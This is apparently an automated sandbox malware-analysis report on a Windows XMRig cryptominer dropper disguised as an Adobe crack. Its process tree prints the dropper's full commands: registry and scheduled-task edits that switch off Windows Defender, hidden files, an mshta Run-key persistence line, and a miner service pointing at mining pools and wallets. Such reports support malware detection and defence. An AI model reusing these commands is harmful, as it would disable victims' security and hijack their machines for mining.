xmrig | 9ea9441f7c4279b04044795c514dab27c1a7129dc744044207cdd4dba0859dc9

Analysis

max time kernel
129s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2022 13:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
Size

4.1MB
MD5

f962628bdeea7557ae61ea61b3e8bd51
SHA1

ebec33d67bd123146341e02690637f8a40234f27
SHA256

202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f
SHA512

51c552e057010c759ead1f4ead26477d14a2190f3f3c620e16dad9d06c37d3f82cc8508ac0e6f0febb1715e241ebabf2ffaa9170540ef376d7b878f0368abcb7
SSDEEP

98304:nktEDt0k984nukQYxQFKWRw3hmXsFALcQUkfL3BIdw48phwTpb+:np0k98caxFLRyhulUkD3BIP8b6b+

Score

10^/10

xmrig evasion miner persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral2/files/0x0001000000022e18-182.dat	xmrig

Executes dropped EXE 5 IoCs

pid	Process
4920	7za.exe
3324	update.exe
5104	NSudo.exe
4584	nssm.exe
4428	nssm.exe

Sets file to hidden 1 TTPs 4 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
4484	attrib.exe
3292	attrib.exe
2116	attrib.exe
3064	attrib.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	WScript.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0001000000022e1e-174.dat	autoit_exe
behavioral2/files/0x0001000000022e1e-175.dat	autoit_exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\debug.log	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\debug.log	chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
5104	NSudo.exe
5104	NSudo.exe
4628	chrome.exe
4628	chrome.exe
3344	chrome.exe
3344	chrome.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeRestorePrivilege	4920	7za.exe
Token: 35	4920	7za.exe
Token: SeSecurityPrivilege	4920	7za.exe
Token: SeSecurityPrivilege	4920	7za.exe
Token: 18446744065119617044	5104	NSudo.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3324	update.exe
3324	update.exe
3324	update.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3324	update.exe
3324	update.exe
3324	update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1284 wrote to memory of 4512	1284	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe	83
PID 1284 wrote to memory of 4512	1284	202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe	83
PID 4512 wrote to memory of 2248	4512	cmd.exe	86
PID 4512 wrote to memory of 2248	4512	cmd.exe	86
PID 4512 wrote to memory of 2204	4512	cmd.exe	87
PID 4512 wrote to memory of 2204	4512	cmd.exe	87
PID 4512 wrote to memory of 3568	4512	cmd.exe	88
PID 4512 wrote to memory of 3568	4512	cmd.exe	88
PID 4512 wrote to memory of 4468	4512	cmd.exe	89
PID 4512 wrote to memory of 4468	4512	cmd.exe	89
PID 4512 wrote to memory of 1476	4512	cmd.exe	90
PID 4512 wrote to memory of 1476	4512	cmd.exe	90
PID 4512 wrote to memory of 1960	4512	cmd.exe	91
PID 4512 wrote to memory of 1960	4512	cmd.exe	91
PID 4512 wrote to memory of 4220	4512	cmd.exe	92
PID 4512 wrote to memory of 4220	4512	cmd.exe	92
PID 4512 wrote to memory of 3716	4512	cmd.exe	93
PID 4512 wrote to memory of 3716	4512	cmd.exe	93
PID 4512 wrote to memory of 3104	4512	cmd.exe	94
PID 4512 wrote to memory of 3104	4512	cmd.exe	94
PID 4512 wrote to memory of 340	4512	cmd.exe	95
PID 4512 wrote to memory of 340	4512	cmd.exe	95
PID 4512 wrote to memory of 2664	4512	cmd.exe	96
PID 4512 wrote to memory of 2664	4512	cmd.exe	96
PID 4512 wrote to memory of 4812	4512	cmd.exe	97
PID 4512 wrote to memory of 4812	4512	cmd.exe	97
PID 4512 wrote to memory of 3120	4512	cmd.exe	98
PID 4512 wrote to memory of 3120	4512	cmd.exe	98
PID 4512 wrote to memory of 4276	4512	cmd.exe	99
PID 4512 wrote to memory of 4276	4512	cmd.exe	99
PID 4512 wrote to memory of 3484	4512	cmd.exe	100
PID 4512 wrote to memory of 3484	4512	cmd.exe	100
PID 4512 wrote to memory of 4104	4512	cmd.exe	101
PID 4512 wrote to memory of 4104	4512	cmd.exe	101
PID 4512 wrote to memory of 740	4512	cmd.exe	102
PID 4512 wrote to memory of 740	4512	cmd.exe	102
PID 4512 wrote to memory of 936	4512	cmd.exe	103
PID 4512 wrote to memory of 936	4512	cmd.exe	103
PID 4512 wrote to memory of 4640	4512	cmd.exe	104
PID 4512 wrote to memory of 4640	4512	cmd.exe	104
PID 4512 wrote to memory of 4336	4512	cmd.exe	105
PID 4512 wrote to memory of 4336	4512	cmd.exe	105
PID 4512 wrote to memory of 4544	4512	cmd.exe	106
PID 4512 wrote to memory of 4544	4512	cmd.exe	106
PID 4512 wrote to memory of 1456	4512	cmd.exe	107
PID 4512 wrote to memory of 1456	4512	cmd.exe	107
PID 4512 wrote to memory of 3380	4512	cmd.exe	108
PID 4512 wrote to memory of 3380	4512	cmd.exe	108
PID 4512 wrote to memory of 4460	4512	cmd.exe	109
PID 4512 wrote to memory of 4460	4512	cmd.exe	109
PID 4512 wrote to memory of 3616	4512	cmd.exe	110
PID 4512 wrote to memory of 3616	4512	cmd.exe	110
PID 4512 wrote to memory of 3260	4512	cmd.exe	111
PID 4512 wrote to memory of 3260	4512	cmd.exe	111
PID 4512 wrote to memory of 4184	4512	cmd.exe	112
PID 4512 wrote to memory of 4184	4512	cmd.exe	112
PID 4512 wrote to memory of 4516	4512	cmd.exe	113
PID 4512 wrote to memory of 4516	4512	cmd.exe	113
PID 4512 wrote to memory of 3620	4512	cmd.exe	114
PID 4512 wrote to memory of 3620	4512	cmd.exe	114
PID 4512 wrote to memory of 3456	4512	cmd.exe	115
PID 4512 wrote to memory of 3456	4512	cmd.exe	115
PID 4512 wrote to memory of 4736	4512	cmd.exe	116
PID 4512 wrote to memory of 4736	4512	cmd.exe	116

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4484	attrib.exe
3292	attrib.exe
2116	attrib.exe
3064	attrib.exe

C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1284
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:2248
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:2204
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:3568
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:4468
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1476
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1960
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4220
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3716
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3104
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:340
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:2664
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:4812
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    3⤵
    PID:3120
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:4276
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:3484
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:4104
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:740
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:936
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:4640
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4336
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
    3⤵
    PID:4544
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
    3⤵
    PID:1456
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
    3⤵
    PID:3380
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:4460
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:3616
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:3260
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4184
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4516
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:3620
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:3456
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:4736
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4524
- - C:\Perform\7za.exe
    7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4920
- - C:\Perform\update.exe
    C:\Perform\update.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3324
  - - C:\Perform\Resources\NSudo.exe
      C:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.7
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5104
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"
    3⤵
    - Checks computer location settings
    - Adds Run key to start application
    PID:3020
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")
      4⤵
      Checks computer location settings
      PID:4804
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/
        5⤵
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:3344
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffcf0474f50,0x7ffcf0474f60,0x7ffcf0474f70
        6⤵
        
        PID:3996
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --headless --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1420 /prefetch:2
        6⤵
        
        PID:3672
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --lang=en-US --service-sandbox-type=network --use-gl=swiftshader-webgl --mute-audio --headless --mojo-platform-channel-handle=1644 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4628
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --remote-debugging-port=9222 --allow-pre-commit-input --field-trial-handle=1388,10782583025796705246,7554459429156289661,131072 --disable-databases --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1700 /prefetch:1
        6⤵
        Drops file in Program Files directory
        
        PID:2108
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4484
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform\Defender.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3292
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform\nssm.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2116
- - C:\Windows\system32\attrib.exe
    attrib +s +h C:\Perform\7za.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3064
- - C:\Perform\nssm.exe
    nssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"
    3⤵
    - Executes dropped EXE
    PID:4584
- - C:\Perform\nssm.exe
    nssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START
    3⤵
    - Executes dropped EXE
    PID:4428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4392

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Perform\7za.exe

Filesize
674KB

MD5
0184e6ebe133ef41a8cc6ef98a263712

SHA1
cb9f603e061aef833a2db501aa8ba6ba007d768e

SHA256
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229

SHA512
6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

Download Submit
C:\Perform\Defender.exe

Filesize
7.0MB

MD5
33dcb753b2236649ae2f13d898e8eb5d

SHA1
f9be1a9b50b55d9244e20c8ea79ad276854f461c

SHA256
f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160

SHA512
7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731

Download Submit
C:\Perform\Resources\NSudo.exe

Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Perform\nssm.exe

Filesize
317KB

MD5
bd3b9dac9198c57238d236435bf391ca

SHA1
e0b966cfbe9e804319cfd3b756b12ad8a2294b24

SHA256
682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d

SHA512
81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

Download Submit
C:\Perform\nssm.exe

Filesize
317KB

MD5
bd3b9dac9198c57238d236435bf391ca

SHA1
e0b966cfbe9e804319cfd3b756b12ad8a2294b24

SHA256
682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d

SHA512
81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

Download Submit
C:\Perform\nssm.exe

Filesize
317KB

MD5
bd3b9dac9198c57238d236435bf391ca

SHA1
e0b966cfbe9e804319cfd3b756b12ad8a2294b24

SHA256
682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d

SHA512
81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

Download Submit
C:\Perform\up.vbs

Filesize
745B

MD5
9fc9cd6fff29c03e2b164cafe21543a1

SHA1
c348cd40f9e112413a2587ef3036628a056aee13

SHA256
b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1

SHA512
1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b

Download Submit
C:\Perform\update.exe

Filesize
1.1MB

MD5
0e4afc55e03f8fe26d82e054004c16a3

SHA1
e5560a6d10d11e84eb094561ae1ec1c4461dd2c7

SHA256
d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e

SHA512
48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

Download Submit
C:\Perform\update.exe

Filesize
1.1MB

MD5
0e4afc55e03f8fe26d82e054004c16a3

SHA1
e5560a6d10d11e84eb094561ae1ec1c4461dd2c7

SHA256
d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e

SHA512
48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7za.exe

Filesize
674KB

MD5
0184e6ebe133ef41a8cc6ef98a263712

SHA1
cb9f603e061aef833a2db501aa8ba6ba007d768e

SHA256
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229

SHA512
6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\B088.tmp\B099.tmp\B09A.bat

Filesize
5KB

MD5
55f5a5033d59e83f200f78efd8cf9ffd

SHA1
b153b8f0da50ffc56996bafa0be0610cec8b9d99

SHA256
